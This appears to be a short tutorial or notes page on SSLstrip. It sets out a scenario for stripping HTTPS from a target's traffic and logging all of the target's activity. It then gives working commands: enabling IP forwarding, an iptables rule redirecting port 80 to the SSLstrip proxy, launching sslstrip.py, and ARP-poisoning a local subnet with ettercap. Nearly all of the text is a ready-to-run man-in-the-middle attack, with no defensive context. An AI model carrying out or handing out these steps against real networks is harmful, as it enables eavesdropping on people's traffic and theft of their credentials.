SSLstrip works as proxy which replaces HTTPS ref­er­ences in HTTP, HTML, JS,.… respons­es with HTTP versions.

Instal­la­tion: SSLstrip is old. Cre­ate a venv and install an old­er ver­sion of twist­ed: venv/bin/pip install Twisted==18.9.0

Remove HTTPS references via MitM

Sce­nario:

• You want that $tar­get routes all HTTP traf­fic through your own system.
• Your sys­tem should remove each HTTPs reference.
• You want to log all activ­i­ty from $tar­get.

Per­form the fol­low­ing steps on your attack­ing system:

1. Acti­vate IP for­ward­ing:
   # echo "1" > /proc/sys/net/ipv4/ip_forward
2. Redi­rect all incom­ing traf­fic to port 80 to the SSLstripe proxy at 8080:
   # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3. Start SSLStrip:
   root@imac2019-kali:/opt/sslstrip# venv/bin/python2.7 sslstrip.py -l 8080
4. Start Etter­cap and poi­son the tar­get in the local net­work:
   # ettercap -TqM arp:remote /192.168.178.60-70// /192.168.178.60-70//